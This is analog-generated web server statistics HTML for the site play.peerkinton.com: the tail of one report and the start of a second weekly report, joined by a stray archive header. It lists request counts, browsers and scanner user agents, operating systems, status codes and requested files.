<tr><td class="R">3</td><td class="b"> 1.47%</td><td class="xl">44</td></tr> <tr><td class="R">3</td><td class="b"> 2.79%</td><td class="xl">27</td></tr> <tr><td class="R">3</td><td class="b"> 3.51%</td><td class="xl">64.227</td></tr> <tr><td class="R">2</td><td class="b"> 1.37%</td><td class="xl">72</td></tr> <tr><td class="R">2</td><td class="b"> 0.14%</td><td class="xl">194.87</td></tr> <tr><td class="R">2</td><td class="b"> 2.82%</td><td class="xl">64.15</td></tr> <tr><td class="R">2</td><td class="b"> 2.82%</td><td class="xl">192.175</td></tr> <tr><td class="R">1</td><td class="b"> 0.69%</td><td class="xl">52</td></tr> <tr><td class="R">1</td><td class="b"> 0.10%</td><td class="xl">16</td></tr> <tr><td class="R">1</td><td class="b"> 0.10%</td><td class="xl">18</td></tr> <tr><td class="R">1</td><td class="b"> 1.41%</td><td class="xl">91</td></tr> <tr><td class="R">1</td><td class="b"> 0.69%</td><td class="xl">128.199</td></tr> <tr><td class="R">13</td><td class="b"> 8.48%</td><td class="xl">[not listed: 13 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">7</td><td class="xl"><a href="http://www.play.peerkinton.com/">http://www.play.peerkinton.com/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">26</td><td class="xl">http://www.play.peerkinton.com/</td></tr> <tr><td class="R">8</td><td class="xl">http://play.peerkinton.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">10</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">3</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0</td></tr> <tr><td class="R">7</td><td class="P">0</td><td class="xl">[not listed: 2 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">70</td><td class="P">36</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">64</td><td class="P">30</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Safari/535</td></tr> <tr><td class="N">2</td><td class="R">24</td><td class="P">19</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">4</td><td class="P">4</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/137</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/134</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/29</td></tr> <tr><td class="N">4</td><td class="R">2</td><td class="P">2</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">5</td><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla</td></tr> <tr><td class="N">6</td><td class="R">1</td><td class="P">1</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https:</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex</td></tr> <tr><td class="N"> </td><td class="R">2</td><td class="P">0</td><td class="xl">[not listed: 1 browser]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">29</td><td class="P">22</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">29</td><td class="P">17</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">29</td><td class="P">17</td><td class="xl"> Linux</td></tr> <tr><td class="N">3</td><td class="R">21</td><td class="P">13</td><td class="xl">Macintosh</td></tr> <tr><td class="N">4</td><td class="R">25</td><td class="P">11</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">21</td><td class="P">9</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">2</td><td class="xl"> Unknown Windows</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">109</td><td class="xl">200 OK</td></tr> <tr><td class="R">12</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">48</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">7</td><td class="b"> 0.63%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">70</td><td class="b">43.63%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">32</td><td class="b">55.74%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">68</td><td class="b">57.60%</td><td class="xl">[directories]</td></tr> <tr><td class="R">18</td><td class="b">26.69%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">8</td><td class="b">11.46%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">8</td><td class="b"> 3.62%</td><td class="xl">.svg</td></tr> <tr><td class="R">7</td><td class="b"> 0.63%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">68</td><td class="b">57.60%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">34</td><td class="b">41.77%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">7</td><td class="b"> 0.63%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">68</td><td class="b">57.60%</td><td class="D">Jul/29/25 2:01 PM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">13</td><td class="b">11.11%</td><td class="D">Jul/25/25 12:26 PM</td><td class="xl"> <a href="/?192.175.111.253">/?192.175.111.253</a></td></tr> <tr><td class="R">41</td><td class="b">42.40%</td><td class="D">Jul/12/25 5:11 PM</td><td class="xl">[not listed: 7 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK HG�[���g� g� 6.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for play.peerkinton.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://play.peerkinton.com/">play.peerkinton.com</a></h1> <p class="analysisspan">Program started on Sun, Jun 29 2025 at 12:23 PM. <br />Analyzed requests from Sat, Jun 21 2025 at 7:24 PM to Sat, Jun 28 2025 at 4:46 PM (6.89 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Jun 29 2025 at 12:23 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 73 (13) <br /><span class="gensumtitle">Average successful requests per day:</span> 10 (1) <br /><span class="gensumtitle">Successful requests for pages:</span> 36 (13) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 5 (1) <br /><span class="gensumtitle">Failed requests:</span> 31 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 10 (31) <br /><span class="gensumtitle">Distinct hosts served:</span> 35 (39) <br /><span class="gensumtitle">Data transferred:</span> 60.20 kilobytes (9.72 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 8.74 kilobytes (1.39 kilobytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Jun 2025</td><td class="R">73</td><td class="P">36</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Jun 2025 (36 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">6</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">Tue</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">Thu</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">Fri</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">Sat</td><td class="R">61</td><td class="P">24</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 1</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 2</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 3</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 4</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 5</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 6</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 7</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x"> 8</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x"> 9</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> <tr><td class="x">10</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">11</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">12</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">13</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">14</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">15</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">16</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">17</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">18</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">19</td><td class="R">32</td><td class="P">11</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">24</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">22</td><td class="R">0</td><td class="P">0</td><td class="bar"></td></tr> <tr><td class="x">23</td><td class="R">2</td><td class="P">2</td><td class="bar"><img src="/images/barb2.png" alt="++" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a 